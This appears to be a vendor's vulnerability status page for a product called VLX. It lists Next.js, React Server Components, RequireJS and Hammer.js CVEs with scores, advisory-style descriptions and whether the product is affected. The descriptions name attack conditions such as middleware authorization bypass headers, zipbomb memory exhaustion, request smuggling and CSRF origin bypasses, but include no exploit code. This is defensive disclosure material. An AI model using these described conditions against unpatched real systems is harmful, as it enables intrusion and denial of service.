Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.

not affected

2024-12-17

High 7.5

CVE-2024-51479

Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.

not affected

2025-01-03

Medium 5.3

CVE-2024-56332

Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.

not affected

2025-04-02

Low 1.7

CVE-2025-30218

Next.js is a React framework for building full-stack web applications. To mitigate CVE-2025-29927, Next.js validated the x-middleware-subrequest-id which persisted across multiple incoming requests. However, this subrequest ID is sent to all requests, even if the destination is not the same host as the Next.js application. Initiating a fetch request to a third-party within Middleware will send the x-middleware-subrequest-id to that third party. This vulnerability is fixed in 12.3.6, 13.5.10, 14.2.26, and 15.2.4.

not affected

2025-03-21

Critical 9.1

CVE-2025-29927

Next.js is a React framework for building full-stack web applications. Prior to 14.2.25 and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 14.2.25 and 15.2.3.

not affected

2025-05-14

Low 3.7

CVE-2025-32421

Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.

not affected

2025-05-30

Low 2.3

CVE-2025-48068

Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.

not affected

2025-07-03

Low 3.7

CVE-2025-49005

Next.js is a React framework for building full-stack web applications. In Next.js App Router from 15.3.0 to before 15.3.3 and Vercel CLI from 41.4.1 to 42.2.0, a cache poisoning vulnerability was found. The issue allowed page requests for HTML content to return a React Server Component (RSC) payload instead under certain conditions. When deployed to Vercel, this would only impact the browser cache, and would not lead to the CDN being poisoned. When self-hosted and deployed externally, this could lead to cache poisoning if the CDN does not properly distinguish between RSC / HTML in the cache

not affected

2025-07-03

High 7.5

CVE-2025-49826

Next.js is a React framework for building full-stack web applications. From versions 15.0.4-canary.51 to before 15.1.8, a cache poisoning bug leading to a Denial of Service (DoS) condition was found in Next.js. This issue does not impact customers hosted on Vercel. Under certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page. This issue has been addressed in version 15.1.8.

not affected

2025-08-29

High 8.2

CVE-2025-57822

Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.

not affected

2025-08-29

Medium 4.3

CVE-2025-55173

Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.

not affected

2025-08-29

Medium 6.2

CVE-2025-57752

Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.

not affected

2025-12-03

High 10.0

CVE-2025-55182

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

not affected

2025-12-11

Medium 5.3

CVE-2025-55183

An information leak vulnerability exists in specific configurations of React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. A specifically crafted HTTP request sent to a vulnerable Server Function may unsafely return the source code of any Server Function. Exploitation requires the existence of a Server Function which explicitly or implicitly exposes a stringified argument.

not affected

2025-12-11

High 7.5

CVE-2025-55184

A pre-authentication denial of service vulnerability exists in React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, which can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served.

not affected

2025-12-12

High 7.5

CVE-2025-67779

It was found that the fix addressing CVE-2025-55184 in React Server Components was incomplete and does not prevent a denial of service attack in a specific case. React Server Components versions 19.0.2, 19.1.3 and 19.2.2 are affected, allowing unsafe deserialization of payloads from HTTP requests to Server Function endpoints. This can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served.

not affected

2026-01-26

High 7.5

CVE-2025-59471

A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.

not affected

2026-01-26

High 7.5

CVE-2025-59472

A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion: 1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory. 2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion. Both attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server. To be affected you must have an application running with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.

not affected

2026-03-18

High 7.5

CVE-2026-27979

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, a request containing the `next-resume: 1` header (corresponding with a PPR resume request) would buffer request bodies without consistently enforcing `maxPostponedStateSize` in certain setups. The previous mitigation protected minimal-mode deployments, but equivalent non-minimal deployments remained vulnerable to the same unbounded postponed resume-body buffering behavior. In applications using the App Router with Partial Prerendering capability enabled (via `experimental.ppr` or `cacheComponents`), an attacker could send oversized `next-resume` POST payloads that were buffered without consistent size enforcement in non-minimal deployments, causing excessive memory usage and potential denial of service. This is fixed in version 16.1.7 by enforcing size limits across all postponed-body buffering paths and erroring when limits are exceeded. If upgrading is not immediately possible, block requests containing the `next-resume` header, as this is never valid to be sent from an untrusted client.

under investigation

2026-03-18

Medium 5.4

CVE-2026-27977

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, in `next dev`, cross-site protection for internal websocket endpoints could treat `Origin: null` as a bypass case even if `allowedDevOrigins` is configured, allowing privacy-sensitive/opaque contexts (for example sandboxed documents) to connect unexpectedly. If a dev server is reachable from attacker-controlled content, an attacker may be able to connect to the HMR websocket channel and interact with dev websocket traffic. This affects development mode only. Apps without a configured `allowedDevOrigins` still allow connections from any origin. The issue is fixed in version 16.1.7 by validating `Origin: null` through the same cross-site origin-allowance checks used for other origins. If upgrading is not immediately possible, do not expose `next dev` to untrusted networks and/or block websocket upgrades to `/_next/webpack-hmr` when `Origin` is `null` at the proxy.

under investigation

2026-03-18

Medium 5.3

CVE-2026-27978

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, `origin: null` was treated as a "missing" origin during Server Action CSRF validation. As a result, requests from opaque contexts (such as sandboxed iframes) could bypass origin verification instead of being validated as cross-origin requests. An attacker could induce a victim browser to submit Server Actions from a sandboxed context, potentially executing state-changing actions with victim credentials (CSRF). This is fixed in version 16.1.7 by treating `'null'` as an explicit origin value and enforcing host/origin checks unless `'null'` is explicitly allowlisted in `experimental.serverActions.allowedOrigins`. If upgrading is not immediately possible, add CSRF tokens for sensitive Server Actions, prefer `SameSite=Strict` on sensitive auth cookies, and/or do not allow `'null'` in `serverActions.allowedOrigins` unless intentionally required and additionally protected.

under investigation

2026-03-18

High 7.5

CVE-2026-27980

Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).

under investigation

2026-03-18

Medium 5.5

CVE-2026-29057

Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.

under investigation

RequireJS

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2024-07-01

Medium 6.5

CVE-2024-38998

 requirejs v2.3.6 was discovered to contain a prototype pollution via the function config. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

 yes

4.1.1

Hammer.js

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

Version 2.0.8 - no known vulnerabilities

JavaScript errors detected

Please note, these errors can depend on your browser setup.

If this problem persists, please contact our support.

Contact Support Close